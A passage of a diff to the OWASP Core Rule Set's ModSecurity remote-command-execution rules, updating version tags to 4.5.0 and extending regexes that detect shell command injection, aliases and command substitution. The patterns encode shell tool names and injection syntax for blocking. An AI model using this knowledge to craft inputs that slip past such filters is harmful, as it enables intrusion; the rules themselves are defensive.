"@rx ^\(\s*\)\s+{" \ tag:'OWASP_CRS',\ tag:'capec/1000/152/248/88',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -247,11 +246,11 @@ SecRule ARGS_NAMES|ARGS|FILES_NAMES "@rx ^\(\s*\)\s+{" \ tag:'OWASP_CRS',\ tag:'capec/1000/152/248/88',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" -SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx \ba[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?l[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?s\b[\s\x0b]+[!\"%',0-9@-Z_a-z]+=[^\s\x0b]" \ +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx \ba[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?l[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?s\b[\s\x0b]+(?:[\+\-][a-z]+\+?[\s\x0b]+)?[!\"%',-\.0-9@-Z_a-z]+=[^\s\x0b]" \ "id:932175,\ phase:2,\ block,\ @@ -267,7 +266,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'OWASP_CRS',\ tag:'capec/1000/152/248/88',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -287,7 +286,7 @@ SecRule FILES|REQUEST_HEADERS:X-Filename|REQUEST_HEADERS:X_Filename|REQUEST_HEAD tag:'OWASP_CRS',\ tag:'capec/1000/152/248/88',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -307,7 +306,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'OWASP_CRS',\ tag:'capec/1000/152/248/88',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -327,13 +326,13 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'OWASP_CRS',\ tag:'capec/1000/152/248/88',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:932013,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-932-APPLICATION-ATTACK-RCE" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:932014,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-932-APPLICATION-ATTACK-RCE" -SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?y[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?x|c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?v|v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?l)|[ls][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e|n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e(?:[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t)?|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h|[\n\r;=`\{]|\|\|?|&&?|\$(?:\(\(?|\{)|<(?:\(|<<)|>\(|\([\s\x0b]*\))[\s\x0b]*(?:[\$\{]|(?:[\s\x0b]*\(|!)[\s\x0b]*|[0-9A-Z_a-z]+=(?:[^\s\x0b]*|\$(?:.*|.*)|[<>].*|'.*'|\".*\")[\s\x0b]+)*[\s\x0b]*[\"']*(?:[\"'-\+\--9\?A-\]_a-z\|]+/)?[\"'\x5c]*\.[\s\x0b].*\b" \ +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:932013,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-932-APPLICATION-ATTACK-RCE" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:932014,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-932-APPLICATION-ATTACK-RCE" +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?y[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?x|c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?v|v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?l)|[ls][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e|n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e(?:[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t)?|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h|[\n\r;=`\{]|\|\|?|&&?|\$(?:\(\(?|[\[\{])|<(?:\(|<<)|>\(|\([\s\x0b]*\))[\s\x0b]*(?:[\$\{]|(?:[\s\x0b]*\(|!)[\s\x0b]*|[0-9A-Z_a-z]+=(?:[^\s\x0b]*|\$(?:.*|.*)|[<>].*|'.*'|\".*\")[\s\x0b]+)*[\s\x0b]*[\"']*(?:[\"'-\+\--9\?A-\]_a-z\|]+/)?[\"'\x5c]*\.[\s\x0b].*\b" \ "id:932231,\ phase:2,\ block,\ @@ -349,11 +348,11 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'OWASP_CRS',\ tag:'capec/1000/152/248/88',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" -SecRule REQUEST_HEADERS:User-Agent|REQUEST_HEADERS:Referer "@rx \$(?:\((?:.*|\(.*\))\)|\{.*\})|[<>]\(.*\)|/[0-9A-Z_a-z]*\[!?.+\]" \ +SecRule REQUEST_HEADERS:User-Agent|REQUEST_HEADERS:Referer "@rx \$(?:\((?:.*|\(.*\))\)|\{.*\}|\[.*\])|[<>]\(.*\)|/[0-9A-Z_a-z]*\[!?.+\]" \ "id:932131,\ phase:1,\ block,\ @@ -369,7 +368,7 @@ SecRule REQUEST_HEADERS:User-Agent|REQUEST_HEADERS:Referer "@rx \$(?:\((?:.*|\(. tag:'OWASP_CRS',\ tag:'capec/1000/152/248/88',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" @@ -389,7 +388,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'OWASP_CRS',\ tag:'capec/1000/152/248/88',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.932200_matched_var_name=%{matched_var_name}',\ chain" @@ -416,7 +415,7 @@ SecRule REQUEST_HEADERS:Referer "@rx ^[^#]+" \ tag:'OWASP_CRS',\ tag:'capec/1000/152/248/88',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.932205_matched_var_name=%{matched_var_name}',\ chain" @@ -447,7 +446,7 @@ SecRule REQUEST_HEADERS:Referer "@rx ^[^\.]*?(?:['\*\?\x5c`][^\n/]+/|/[^/]+?['\* tag:'OWASP_CRS',\ tag:'capec/1000/152/248/88',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.932206_matched_var_name=%{matched_var_name}',\ chain" @@ -458,7 +457,7 @@ SecRule REQUEST_HEADERS:Referer "@rx ^[^\.]*?(?:['\*\?\x5c`][^\n/]+/|/[^/]+?['\* "t:none,\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" -SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i).\|(?:[\s\x0b]*|b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?y[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?x|c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?v|v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?l)|[ls][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e|n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e(?:[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t)?|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h|[\n\r;=`\{]|\|\|?|&&?|\$(?:\(\(?|\{)|<(?:\(|<<)|>\(|\([\s\x0b]*\))[\s\x0b]*(?:[\$\{]|(?:[\s\x0b]*\(|!)[\s\x0b]*|[0-9A-Z_a-z]+=(?:[^\s\x0b]*|\$(?:.*|.*)|[<>].*|'.*'|\".*\")[\s\x0b]+)*[\s\x0b]*[\"']*(?:[\"'-\+\--9\?A-\]_a-z\|]+/)?[\"'\x5c]*(?:7[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?z(?:[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[arx])?|G[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?E[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?T|a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:b|(?:p[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?)?t|r(?:[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[jp])?|s(?:[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h)?|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[ks])|b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?z[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?z|c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[89][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?9|[au][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t|c|(?:m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?)?p|s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h)|d[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[dfu]|i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[gr])|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[bdx]|n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?v|q[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n|s(?:[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h)?)|f[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[cdgi]|m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t|t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\